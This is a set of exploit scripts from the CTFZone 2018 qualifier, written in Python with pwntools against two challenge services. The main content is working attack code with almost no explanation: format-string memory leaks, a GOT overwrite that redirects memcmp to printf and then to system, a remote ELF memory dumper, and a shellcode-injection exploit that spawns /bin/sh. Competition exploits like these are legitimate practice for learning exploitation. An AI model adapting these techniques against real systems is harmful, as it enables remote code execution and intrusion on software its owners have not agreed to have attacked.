CTFZone 2018 Quals exps

1_CTFZone_2018_Quals_exps

easypwn_strings, Mobile Bank

bank-exp.py

#!/usr/bin/env python
# coding=utf8

from pwn import remote, context, p32, DynELF, ELF, u32, info
import ctypes

#context.log_level = 'debug'

p = remote('pwn-04.v7frkwrfyhsjtbpfcppnu.ctfz.one', 1337)

def set_id(note_id):
    p.sendlineafter('choice: ', '2')
    p.sendlineafter('id: ', str(note_id))

def set_note(note_id, content):
    set_id(note_id)
    p.sendlineafter('choice: ', '3')
    p.sendlineafter('note: ', content)

def trade(note_id, value):
    set_id(note_id)
    p.sendlineafter('choice: ', '4')
    p.sendlineafter('value: ', str(value))

def enable_debug(pwd):
    p.sendlineafter('choice: ', '6')
    p.sendlineafter('password: ', pwd)

def _leak(adr):
    fsb_payload = "|%7$s|aa" + p32(adr)
    enable_debug(fsb_payload)
    r = p.recvuntil('|aa')
    data = r.split('|')[1]
    return data + '\x00'

def leak(adr):
    info('leak: 0x%08x', adr)
    data = _leak(adr)
    while len(data) < 4:
        data += _leak(adr + len(data))
    info('   ---> %08x', u32(data[:4]))
    return data[:4]

def _off_id_to_notes_ptr(adr):
    base = 0x22088
    offset = adr - base
    if offset > 0 or offset % 8 != 0:
        raise
    return offset / 8

def weak_leak(adr):
    info('weak_leak: 0x%08x', adr)
    off_id = _off_id_to_notes_ptr(adr)
    set_id(off_id)
    # account info
    p.sendlineafter('choice: ', '5')
    p.recvuntil('value: ')
    value = p.recvuntil('$, ')[:-3]
    return p32(int(value) & 0xffffffff)

def _cint32_minus(left, right):
    left_int = ctypes.c_int32(left)
    right_int = ctypes.c_int32(right)
    return ctypes.c_int32(left_int.value - right_int.value).value

# enable_debug('whatever')
printf_plt = 0x10754
memcmp_got = 0x22050
memcmp_got_value = u32(weak_leak(memcmp_got))
info('memcmp_got_value: 0x%08x', memcmp_got_value)
# modify memcmp_got to printf_plt to make a Format String Bug
trade(_off_id_to_notes_ptr(memcmp_got), _cint32_minus(printf_plt, memcmp_got_value))

main = 0x11284
d = DynELF(leak, main, elf=ELF('./mobile_bank'))
system_libc = d.lookup('system', 'libc')
info('system_libc: 0x%08x', system_libc)

# system_libc = memcmp_got_value - 175752
# info('system_libc: 0x%08x', system_libc)

# memcmp_got has been modifided to printf_plt(AKA 0x10754)
system_off_to_printf_plt = _cint32_minus(system_libc, printf_plt)
trade(_off_id_to_notes_ptr(memcmp_got), system_off_to_printf_plt)

# now call memcpy again and trigger system
enable_debug('/bin/sh\x00')

p.interactive()

strings-dump.py

from pwn import remote, p32, info

def dump(adr, frmt='s'):
    p = remote('pwn-03.v7frkwrfyhsjtbpfcppnu.ctfz.one', 1234)
    raw_adr = p32(adr)
    #print raw_adr
    if '\n' in raw_adr or '\x00' in raw_adr:
        return ('', '')

    leak_part = '|%13${}|'.format(frmt)
    payload = leak_part.ljust(12, 'A') + 'EOF_strs' + raw_adr
    info(payload)
    p.sendlineafter('3. StrRemoveLastSymbols\r\n',  '3')
    p.sendlineafter('Set string:\r\n', payload)
    p.sendlineafter('Set number:\r\n', '0')
    p.recvuntil('Result:\r\n')
    r = p.recvuntil('EOF_strs')
    p.close()
    return r.split('|')[1], r

adr = 0x804a000
# You need to previously create a file named dump.raw that contains one byte '\x7f' as the first byte of the ELF magic number.
adr += len(open('dump.raw').read())
while True:
    with open('dynamic.raw', 'a') as f:
        info('leak 0x{:08x}'.format(adr))
        leak = dump(adr, 's')[0] + "\x00"
        adr += len(leak)
        info(" --> {}".format(repr(leak)))
        f.write(leak)
        f.flush()

strings-exp.py

from pwn import remote, p32, process, shellcraft, asm

#p = process('./babypwn', env={"LD_PRELOAD": "./babylibc"})
p = remote('pwn-03.v7frkwrfyhsjtbpfcppnu.ctfz.one', 1234)
shellcode = asm(shellcraft.i386.linux.sh()) + 'y'
payload = shellcode.ljust(256, '\x00') + p32(0x80492e0)
p.sendlineafter('3. StrRemoveLastSymbols\r\n',  'X')
p.sendlineafter('(y or n)\r\n', payload)
p.interactive()